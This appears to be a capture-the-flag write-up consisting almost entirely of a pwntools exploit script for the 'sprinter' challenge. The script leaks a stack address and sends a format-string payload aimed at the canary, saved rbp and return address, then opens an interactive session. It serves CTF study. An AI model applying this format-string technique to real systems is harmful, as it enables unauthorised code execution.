Please see the original writeup, which was written in Korean.
```python
from pwn import *
# Retry loop: each pass opens a fresh connection, sends one payload, and
# drops into an interactive session if nothing raised along the way.
# NOTE(review): on failure the tube from the previous attempt is never closed,
# and the loop retries immediately with no delay or attempt limit.
while True:
    try:
        # Local-binary alternative kept from the original for reference.
        # io = process('vuln')
        io = remote('sprinter.chal.idek.team', 1337)

        # The service prints a value after "0x"; the next 12 hex digits are
        # parsed as the leaked stack address.
        io.recvuntil(b'0x', timeout=10)
        stack_leak = int(io.recvn(12), 16)
        print(f'stack_leak : {hex(stack_leak)}')

        # Offset from the leak to what the author calls the canary slot.
        # The 0x108 distance is specific to this challenge binary.
        canary_addr = stack_leak + 0x108

        # Format-directive section of the payload. Presumably this reaches a
        # printf-family call in the target as the format string (binary not
        # shown here); the positional arguments 10, 11 and 12 are the three
        # pointers appended below, per the author's annotations.
        directives = b''.join([
            b'\x01\xfb\xff%5$261c',
            b'%4$c',
            b'%10$.7s',
            b'%8c',              # author's label: rbp
            b'%12$.3s%11$.5s',   # author's label: ret
        ])

        # Zero-fill to 0x26 bytes, then two more NULs, so the pointer table
        # begins at the 8-byte-aligned offset 0x28.
        directives = directives.ljust(0x26, b'\0') + b'\0' * 0x2

        pointer_table = (
            p64(canary_addr + 1)            # 10
            + p64(canary_addr + 8*4 + 3)    # 11
            + p64(stack_leak)               # 12
        )
        payload = directives + pointer_table

        # pause()
        io.sendline(payload)

        # Show up to 100 bytes of whatever the service answers within 1 second.
        reply = io.recvn(100, timeout=1)
        print(repr(reply))

        io.interactive()
        break
    except Exception as ex:
        # Any failure (timeout, EOF, parse error on the leak) is printed and
        # the whole attempt is repeated from the connect step.
        print(ex)
```